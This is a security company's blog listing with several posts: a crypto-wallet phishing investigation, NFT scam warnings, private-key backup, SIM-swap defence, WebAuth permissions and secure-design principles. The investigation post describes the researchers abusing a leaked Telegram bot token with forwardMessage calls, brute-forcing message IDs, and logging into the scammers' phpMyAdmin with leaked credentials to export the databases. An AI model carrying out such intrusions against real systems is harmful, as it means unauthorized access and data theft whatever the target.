Category: Alvosec

Intro

In the last few months, we’ve detected an increase of new strategies used by malicious attackers. Unfortunately, they were successful in draining a lot of crypto wallets – stealing more than $1 million worth in different cryptocurrencies. After we realized that multiple victims were unable to recognize new attack methods as malicious, we’ve begun an investigation.

New phishing method

This phishing method takes advantage of the fact that characters from various languages and scripts are sometimes visually similar to each other. For example, the Cyrillic “а” and the Latin “a” look virtually identical. This technique is known as a homograph attack.

Here is a scam Twitter account that was used to distribute malicious content. Pay attention to the letter ŏ in the domain.

Another phishing account on Twitter.

Again, pay attention to the letter á in the domain. That’s called IDN domain.

Internationalized Domain Names (IDNs) enable people around the world to use domain names in local languages and scripts.

Here are a couple more examples of IDN phishing domains:

What happens if a victim visits a website?

These malicious websites often look like legitimate websites, where they promote fake airdrops. To claim airdrop, victims will be prompted to either connect their MetaMask or TrustWallet.

So if a wallet has allowed a website to connect and that website is controlled by a bad actor, they will try to initiate a sending out of assets to their wallet address.

This attack targets user wallet as you can see in the code bellow, where attacker defined user_wallet for the purpose of ‘draining’.

In the chain of these attacks we detected several addresses, the one from picture you can check on Etherscan.

Investigating scam websites

First, we started to investigate where it started. These bad actors will purchase domains that look like legitimate domains, and often victims will not spot the difference. If you ask yourself what is a TLD (.com, .org, .net etc.) of top 5 websites that you visit every day, you may confuse them. That’s why it’s easier to confuse/exploit a user by changing a detail that rarely people focus on it.

Most of these websites were using CloudFlare as reverse proxy, to hide the actual server where they host a website. But since that was not important for us, we started to search for more valuable information that would lead us closer to the attackers. We’ve checked JavaScript files and found out that some of them were obfuscated. The process of de-obfuscation was pretty complex, and that took plenty of time – but we ‘knew’ that we will find some important data which attackers intentionally tried to hide.

Firstly, we came across that they used multiple wallets where they sent stolen funds. Secondly, we found Telegram Bot credentials which were used to notify the attacker via Telegram service.

Here are some basic information about bot.

Telegram bot leaked for us a list of users that were interacting with this bot.

Since this bot had enabled privacy and function can_read_all_group_messages was disabled, we couldn’t get all messages created by bot. We tried multiple functions, creating invite link, forward messages to our chat etc., but without success.

approveChatJoinRequest?chat_id=

At some point, we tried to forward messages from their group to their group again.

forwardMessage?chat_id=-<id>&from_chat_id=-<id>

Bam, it worked! We were able to read all responses from every message_id. Furthermore, we were aware that time was ticking before scammer realize what’s going on. It was necessary to quickly extract all messages, so we used Burp Suite – Intruder to set up payload for brute-forcing every message_id=.

As soon as they realized that we were forwarding all messages, they deleted the chat.

Whenever someone connected wallet, these scammers were immediately notified. They were also recording visitors IP, successful transactions, etc.

As soon as you build something, you are tempted to test first, and that’s exactly what they did. They connected their wallet to their scam website, and even drained a couple of USDT.

Also, they were first to visit their website and leave all the traces (IP addresses). Every person in a criminal act leaves traces, there is no such thing as “perfect crime”. They did another crucial mistake, they allowed to connect their old wallet in the chain of all transactions, which allowed us to track to wallet that was funded from Binance.

Soon after we gathered various types of information, we noted an unusual .php file that was loaded in page. Quick check and bam again, new information, this time – mysql credentials.

No hesitation, fuzz gave us 200 on phpmyadmin, meaning it was enabled. We used their credentials and logged in to export all databases for further analysis.

The first part of investigation will end here, we need more time to focus on processing all the data that we gathered in order to create clear picture of how these scammers operated.

If you are familiar with techniques used in this research, and you are interested to participate in our investigations, feel free to contact us.

To be continued…

With the NFT euphoria, it’s no surprise that scammers are on the hunt for a paycheck. The good news is that knowing the most frequent NFT scams can help you stay a step ahead of fraudsters. Follow along as we explore the most common schemes you need to know about.

Here’s a list of the most common NFTs scams and what you can do to avoid them. 

1. Phishing scams

One of the most common NFT schemes is phishing scams, which involve the use of fake websites that ask for 12-word security seed phrases and private wallet keys. There are also malicious pop-ups shared on Discord, Telegram, Twitter, forums and via email. In most cases, the resemblance with legitimate websites is almost perfect. Thus, it will take a keen eye to spot even the smallest differences in the URL or the website layout.

To avoid phishing scams, it is best to check the URL first before clicking. Remember not to give your seed phrases and private wallet keys to anyone outside of your NFT wallets. 

2. Rug pull scams

Rug pull scams, which got its name from the popular expression “pulling the rug out,” involves fraudulent developers promoting fake NFTs on social media with the goal of convincing more people that the project is real and that they will make more money out of it. 

The scammers will hype up a project, attracting more people to invest and then without notice, discontinue the project. This occurs once they have fully drained the investors, withdrawing all funds in an NFT wallet. After which, the scammers delete all their profiles on marketplaces and social media platforms. 

You can avoid these NFT scams by doing your research. Look for the NFT collection and see if it has legitimate artists and developers behind it. One way to check their legitimacy is by visiting their website or social media accounts.

Active social engagements and several discussions about their crypto projects are good indications that the project is actually genuine.

3. Pump-and-dump crypto schemes

Compared to rug and pull scams that involve convincing people that they should invest in fake crypto or NFT projects, pump-and-dump scams involve scammers buying a large number of cryptocurrencies or NFTs to create an artificial sense of an asset being in high demand. With people thinking that the project is highly profitable, they will start placing their money on it as well. Once a price hits a targeted level, the scammers will then sell the NFTs or cryptos, leaving the investors with non-valuable assets. 

To avoid falling victim to pump-and-dump crypto schemes, make sure to check the number of transactions as well as the buyer of the project you’re interested in. A considerable number of transactions can be an indication of the date when the scammer pumped the crypto or NFT.

4. Bidding scams

Another most popular tactic is called the bidding scam. These involve a scammer changing the cryptocurrency of their offer to a lower value, say ETH to USD. This will cause your earnings to drop to a lower price. 

To avoid bidding scams, double-check the currency used. If a potential buyer negotiates for a lower bid, consider that a red flag. 

5. Plagiarised NFTs

Scammers may copy or steal artwork and list this plagiarised NFT on legitimate sites such as OpenSea, Soon.Market etc. Since it was copied or stolen, the NFT has no value. Sadly, the victim has already spent funds to purchase the NFT before even realizing it is fake. 

Before buying an NFT, look for the seller name, all the information that match the real owner. Also make sure to check when auction ends, as you may see in the fake auction there was a little of time. The real one ends in 3 days 22 hours…

You can also check the authenticity of an NFT by dragging the image of the digital artwork to Google Images. If you find other artists who own the piece, it is more likely that the one you’re about to purchase is fake. 

6. Real example: Copy scam of “Proton DEX Key” NFTs

Unfortunately yesterday we have witnessed a real example of scam that happened in the Proton NFT ecosystem, where scammer stole around 700k $XPR. We’ve asked product leader Marco from Soon.Market to comment the incident.

“When I woke up Friday morning around 7 AM CET I discovered various messages and recognized there have 2 different copies of the original collection been created by a scammer. The scammer launched various auctions with two different accounts. Unfortunately, I woke up too late and some users already placed their bids in two of these auctions. We reacted quickly and put these collections into our blacklist. From that point of time these auctions were not displayed on Soon.Market any longer. As the auction is running decentralized and controlled by the logic written in AtomicMarket contract, there is no possibility to cancel it, meaning that two people in the community lost their money on this auction.”

“It was a very sad moment for us and the NFT community. But I am sure we will get out of this stronger than ever! Though it’s a high advantage of Proton that new accounts can mint their first NFTs for free, it comes with a huge downside as we can see. Different marketplaces provide easy minting solutions and some of them currently allow minting without any further background check. This, unfortunately, is a heaven for scammers and the worst part is: they do not even have to have any technical knowledge!”

Marco told us about their future plans, how they intend to fight against NFT scams:

“We had plans to introduce a community governed blacklisting & whitelisting already for a long time and applied for a developer grant to implement an application that can be used by Proton NFT Watch to take decisions. In September 2022 this grant has finally been approved and after this wake up signal we will prioritize this topic and prepare our market in that regards – NOW!

I am happy to announce that we will soon introduce hints for the users to educate them before buying an actual NFT which is not on the whitelist. In the beginning, the whitelist will contain only the Proton DEX Keys as well as our own collections (“Soon.Market” & “Power of Soon”) and we encourage everybody of the community to join our Discord where we created the #proton-nft-watch channel. Everybody can propose to whitelist a specific collection there and together we will vote and decide if a collection will be whitelisted or not. All collections that are whitelisted will be marked as such on our market and the hint “Watch out for scam” won’t be displayed for these collections. Soony, our notification bot on Telegram, will get the same logic and make it clear if a collection is whitelisted or not.

In the future, we aim to further decentralize this approach and the application that supports Proton NFT Watch will kickstart this initiative. I invite everybody in the community to join our Discord. The first draft for the Proton NFT Watch rules how to handle blacklisting and whitelisting will be shared as soon as possible and everybody is invited to provide their opinion. Let’s educate and help each other to give scammers no chance – we all know: scammers always gonna scam!

In the upcoming weeks we will organize a Twitter Space to discuss our recent updates and future plans, specifically in regards to whitelisting & blacklisting with the help of Proton NFT Watch – stay tuned and watch out for scam!”

Telegram:
Proton NFT Watch: https://t.me/pmnftwatch
Soon.Market: https://t.me/soon_market

Discord:
Soon.Market: https://discord.gg/KtVVaYy6b3

Stay safe!

In this guide we will introduce you to private keys, their importance inside a cryptocurrency wallet and the reasons why you must back them up securely. We will also be making a recommendation on where to safely store your private keys.

Important: If you lose your private key, you will be unable to recover it, and you will lose your funds forever. Please do not confuse private keys that you own with passwords that you can recover!

First and foremost, the golden rule of crypto is to NEVER share your private key with anyone. There are many common scams which trick users into revealing or sharing their private key. These schemes can be very elaborate, so it is recommended to abide by this golden rule in all situations. Follow our blog regularly, because we often publish various articles about different scams.

How do I get my WebAuth private key?

Step 1

Open your wallet and tap on the settings icon which is on the far right.

Step 2

Tap on ‘Backup Wallet’.

Step 3

Type “I will never give my private key to anyone else” to proceed.

Step 4

Tap on the ‘Copy to pasteboard’ button to copy your private key.

Now that you have your private key, it’s time to backup securely.

Where should I store my private key?

How and where to store your private keys is absolutely critical to the security of your crypto assets. Read on to find out how to make sure your crypto funds are safe.

1. Encrypt and store your private key on Cloud

Paste your private key in text editor and save it. Choose any method to encrypt it. (All methods meet the standard for secure file storage!)

• Use PGP to encrypt file. (Read our article: How to create PGP keys to encrypt and sign files)
• Use openssl to symmetricly encrypt file. (Read our article that explains how it is done)

openssl aes-256-cbc -salt -pbkdf2 -in private_key.txt -out private_key.txt.enc

• Use CryptoMator. With Cryptomator, you can encrypt your cloud storage (folder) by creating a vault in your cloud service and uploading your files into it. (Don’t forget to store Cryptomator password!)

Here is an example of encrypted private keys that we stored on cloud:

• Use 7ZIP or ZIP to compress and encrypt file. Select your file and choose compress with encryption.

2. Encrypt and store your private key on removable drive (USB or SD card)

Buy USB and only use it for backup purpose. If you use old USB, make sure it is clean (format it before you use it). Now every single method from previous point can be implemented on USB or SD card.

Beside that removable drive can be encrypted as whole drive. (Veracrypt or BitLocker To Go)

3. Put your private key on paper

Various kinds of paper wallets are one of the oldest kinds of private key storage, and it does still work as long as you generate, print/write, and store the keys securely. (Paper wallets must be combined with one more electronic backup)

Paper is a perishable material. Think for example of the influence that moisture, sun, or simply time have on paper. It discolors and letters may no longer be legible over time.

Here you can use our JavaScript QR code generator to store your private key as QR code. We advise you to download script locally and run in offline mode.

https://github.com/alvosec/qr-code

Keep in mind that some printers store printed data in their internal memory!

4. Consider different backup locations

One of the basic backup rules is to store data on multiple locations, isolated from each other, that’s why we suggest to have at least two copies on different storage locations.

5. Bad practice

Here are some common mistakes that many crypto users will fall into.

• Do not hesitate to backup private keys (Do it now!)
• Do not store private keys in plain text
• Do not make screenshots of your mnemonics or private key (mobile will sync clear photos into cloud)
• Ensure backup media devices are protected (Use AntiVirus software to regularly scan device)
• Do not share your private key with anyone (Learn about crypto scams)

Important: If you are attempting to back up your private key but are accessing from a country where WebAuth is not permitted, you must connect to a VPN to access your private key.

To explore the available features for your account, visit the following page: https://xprotect.org/user-reputation/

Stay safe!

SIM swap fraud occurs when scammers take advantage of a weakness in two-factor authentication and verification and use your phone number to access your account.

SIM swapping happens when scammers contact your mobile provider and trick them into activating a SIM card that the fraudsters have. Once this occurs, the scammers have control over your phone number. Anyone calling or texting this number will contact the scammers’ device, not your smartphone.

This is known as SIM swap fraud, and it means scammers could potentially enter your username and password when logging onto your bank’s website. The bank or any other service will then send a code by text — two-factor authentication — to your smartphone number, a code that you’ll then have to enter to access your online account. The problem? After a SIM swap, that number now goes to the smartphone or other device possessed by scammers. They can then use that code to enter your bank account.

Fortunately, you can protect yourself against SIM swapping. It’s all about preventing scammers from finding out what logins and passwords you use to access your online bank or credit card accounts. And it helps, too, to look out for the most common warning signs of a SIM swap scam.

How can you protect yourself against a SIM swap?

The most important thing to note is to check if you have lost your mobile signal. Whenever a duplicate SIM gets inserted, the victim’s SIM card completely loses the mobile signal as it loses its network access and hence, cannot be used to call or send a text message. If such a thing happens, contact your mobile provider and ask them to deactivate your SIM.

Insider threats aside, the most effective things you can do to prevent fraudulent SIM swaps from happening on your account are:

Step 1

Limit the amount of personal data you post online. Educate yourself to avoid all types of scam!

Step 2

If you are using SMS\Text authentication to gain access to any online accounts, change this to email or Google Authenticator. If the platform does not allow this, seriously consider shifting to another one that does.

Step 3

Never reply to any emails asking for information such as your email address, SSN, or any other personally identifiable information.

Step 4

If you receive a call asking for personal information or any other sensitive information, do not provide it. The fraudster might be pretending to be calling from your bank, crypto exchange or any other service.

Step 5

Some mobile operators require a PIN to be able to perform a SIM swap. Use a hard-to-guess number or phrase as your PIN. Avoid using birthdays or phrases such as your first name or names of pets. And never post this PIN anywhere online.

Wallet security and keeping private keys safe is the most important part of any crypto application/platform’s infrastructure. If the private key of your crypto wallet is stolen, you will lose your funds. And if you lose the private key, the digital coins under that wallet are lost forever. How about, if owner of crypto funds die, how will anyone inherit his assets – if they don’t have access to that wallet? That’s why we would like to guide you through this tutorial, where we will present to you; how to authorize another user/family member, someone you trust completely.

Trenton Kennedy is a communications manager at blockchain analytics company Chainalysis. He pointed to this 2020 blog post when asked to share data on the amount of Bitcoin that may have been lost forever for various reasons, including death.

According to the blog, 20% of all Bitcoin in circulation have been lost, may be forever. That’s the equivalent of 3.7 million BTC, valued at $75 billion at current price rate.

Matthew Mellon passed away in 2018. His death was unexpected and, while he was assumed to be worth around $200 million, most of that money was in cryptocurrency. He hadn’t shared his access keys to that currency with anyone, so no one could get to it.

As being said, this guide will teach you how to authorize another user, so that he/she becomes co-owner of your account. This will also mitigate the risk of loosing private key as well as being compromised.

1. Add your device to WebAuth for Web (Video + Text instructions)

Watch video tutorial if it is easier for you to follow.

In this case, we are going to use WebAuth for Web.

Step 1

Log into an existing account by logging in with your mobile device.

Step 2

Once you’re logged into an existing account, you will need to set up a device key to authenticate transactions and actions.

Step 3

Click Add new device and choose authentication method:

• Native Platform Authenticator: Touch ID for Mac or Windows Hello for Windows. No Linux-based option.
• USB Authenticator: Yubikey or Google Titan that works with all operating systems.
• Ethereum Wallet: You can link any Ethereum wallet to be the authenticator on all operating systems.

In our case, we will select Touch ID and approve it.

You will be prompt:

“Do you want to save a passkey for “debian”? Passkeys are saved in your iCloud Keychain and are available for sign-in on all your devices.”

You can also save on another device if you want.

Important: Deleting browser data, will delete your Touch ID key, so it is critical to back up your seed phrase and/or private key.

Step 4

Enter Device Name (Public) and click Add device.

Step 5

Sign in and you are ready to go.

2. Authorize another user by using WebAuth for Web (Video + Text instructions)

Step 1

Open WebAuth.com, where you already added your account.

Step 2

Open another Tab and navigate to protonscan.io.

Step 3

Login by choosing WebAuth for Browser and Authorize.

Step 4

Click on Wallet down below, then Menu and select Keys and Permissions.

Step 5

Click on Advanced and select Active permission (you can also change Owner permission).

By default Proton wallet has 2 native permissions (Owner and Active):

• Owner: The Owner permission is the “root access” to your Proton wallet and symbolises ownership of the account. This key is needed to make any changes to the ownership of the account.
• Active: used for transferring funds, voting for producers, buying ram, etc.

Step 6

Add account name and permission (active). Scroll up and hit button to save it.

Step 7

Sign this action and check if permission has been updated.

We can see that @alvosec account is now authorized with active permission.

If we click on TX, we will see under Actions signer public key, which we created before by adding new device in WebAuth.com.

If you have any questions, feel free to ask us.

Stay safe!

The explosion of high-quality application development frameworks has been a boon to the world’s software. It’s easier than ever to put together an application and start delivering value for customers, who can come from anywhere in the world. Unfortunately, the same is true for hackers coming to attack your application. As the world’s software grows more connected, and contains more valuable data, hackers have grown more sophisticated. They’re no longer kids in someone’s basement. Today’s hackers command massive botnets and receive sponsorship from hostile nation-states. Networked application security needs to be able to stand up to hundreds of hours of CPU time and committed adversaries.

Here’s the bad news: it’s impossible to write perfectly secure applications. Bugs are going to slip through, and if they do, attackers will find them. But that’s the bad news. The good news is that you can design your applications to minimize the damage those bugs cause. The even better news is that designing secure applications isn’t complicated or mysterious. The key is to follow a few key principles during the application design phase. This way, even when bugs rear their ugly heads, the damage they cause doesn’t lead to attackers obtaining all your valuable data, or the entire service going down.

In this post, we’ll talk about key security principles that will work in any kind of application. Following these principles is critical to ensuring that the software you ship is safe and secure for your customers.

1. Principle of Least Privilege

The first principle for secure design is the Principle of Least Privilege. The Principle of Least Privilege means that you ensure people only have enough access that they need to do their job. For instance: if you design a system which holds sensitive customer financial information, it’s good practice to limit who can access that information. The person who answers the phone and schedules meetings probably doesn’t need access to all of the sensitive information. On the other hand, an account manager probably does need access to that information. The key is ensure that account manager doesn’t have access to information from accounts they don’t manage.

By ensuring that accounts have only the privileges necessary to do their job, you ensure that if an attacker compromises an account, you minimize what information they can access. This limits the damage of the attack.

2. Principle of Separation of Duties

The Principle of Separation of Duties follows on from the Principle of Least Privilege. The idea behind Separation of Duties is that no single role should have too much authority. This is different from the concept of Least Privilege. While that focuses on making sure that people only have the privileges they need to do their job, this is about making sure their job isn’t too big. When someone does a job that’s too big, we fall right back to the point where they’ll need lots of permissions to do that job. Also, when someone has many duties in their job, it means that they’re susceptible to making poor decisions.

In our hypothetical financial system from before, we wouldn’t want the person who’s responsible for making sales also able to approve discounts. That person would have an incentive to discount the software, and might make poor decisions about discounts in order to boost their sales numbers. Instead, someone else, like a manager, should need to approve a discount before the sale finishes.

3. Principle of Defense in Depth

The Defense in Depth Principle is a bit different from preceding principles. While Least Privilege and Separation of Duties think about how people gain access to the system, Defense in Depth is about preventing access to the system. The basic expectation with Defense in Depth is that any security system you put in place is going to fail. It might be very difficult to circumvent computer security systems, but it’s always possible.

Designing with Defense in Depth means setting up systems which will tell you when your designated security fails. For instance, many servers for software systems use security software, but are collocated in a single building. Someone who broke into that building would have physical access to each of the servers. Suddenly, that fancy firewall or intrusion detection software is worthless. This is why data centers are designed with physical security present and security cameras to detect intruders. The world’s best firewall won’t help even a little if you forget to put a $5 lock on the outside door to your data center.

4. Principle of Failing Securely

Much like with Defense in Depth, the Principle of Failing Securely recognizes that things are going to fail. To imagine how a system can Fail Securely, imagine a digital locking mechanism. Perhaps you need a security badge to access sensitive areas of a building. Following the principle of Least Privilege, your security badge only grants access to areas you need to do your job. What happens if the power goes out?

In a system that “fails open” all the locks stop working. Suddenly, you have access to every door in the building! If you’re the malicious sort, now’s the time to go snooping. In a system that instead Fails Securely, all of the doors lock. Instead of granting access to all of the doors in the building, you don’t have access to any of them. No snooping for you, today!

The same concept applies to software design. A system that’s designed to Fail Securely only grants access to parts of the system when every step of the process completes successfully.

5. Principle of Open Design

The Principle of Open Design says that your system security shouldn’t rely on the secrecy of your implementation. This is a particularly important principle for security concepts like cryptographic implementations. Well-designed cryptography implementations are published publicly. They’re interrogated by the smartest people in the world before they’re put into practice.

The same should be true for any software system. For instance, a system which doesn’t Fail Securely, like before, might rely on the idea that “nobody would ever figure that out.” While it’s unlikely that an attacker might deduce that a bug grants access to the system, it’s not impossible. What’s more, if they ever gained access to your source code, they’d figure it out quickly. Instead, follow the principles for secure design to ensure the system is safe, no matter whether someone malicious gains access to your code.

6. Principle of Avoiding Security by Obscurity

Security by Obscurity is similar to the principle of Open Design. Imagine software which has a hard-coded secret username and password combination. When authenticated, this account has full access to every account in the system. The security of this system relies on the credentials of this account remaining a secret. Over time, a growing number of users will gain access to this account. Some will leave the company, but they won’t forget the password. At that point, the security of your application relies on the good will of those employees.

It’s true that every application’s security relies on secrets. Passwords are a critical part of most authentication schemes. There’s nothing that you can do about that. However, a better design for this system is one where the account with full access doesn’t exist in the first place. If you must include it, don’t hard-code the credentials. Instead, make the account a normal account. When someone with access to the account leaves the company, change the password.

7. Principle of Minimizing Attack Surface Area

The Principle of Minimizing Attack Surface Area is all about removing parts of an application to make it more secure. The classic example doesn’t come from software, but from thinking about our imaginary data center again. If you’ve ever visited a data center, you likely noticed they don’t have a lot of windows. Part of this is to benefit cooling the building. But part of the reason data centers aren’t encased in windows is windows are easy to break. You might have the absolute best locks in the business, but they don’t do any good if someone comes in through the window.

Parts of your application are like windows. They look nice, but they might expose functionality that leads to bugs. Minimizing Attack Surface Area questions whether a feature is necessary. Sometimes, by redesigning a feature to make it more simple, the application’s overall security improves.

8. How to Dive Deeper

While these principles aren’t magic, this is still a pretty high-level view. If you’re interested in learning more about designing secure applications, Cprime Learning provides an intensive course that goes into much more detail. If you’re thinking about starting a new application design, this course is a great idea. Many companies find security challenging because they’re unprepared when designing their application. They bake that insecurity into their application. By the time they realize they have a problem, a fix is costly and difficult. Instead, follow the principles laid out here. Learn more about them, and seek to spot them in your application designs. When you do, you’ll improve what you deliver. Your company and your customers will thank you for it!

Source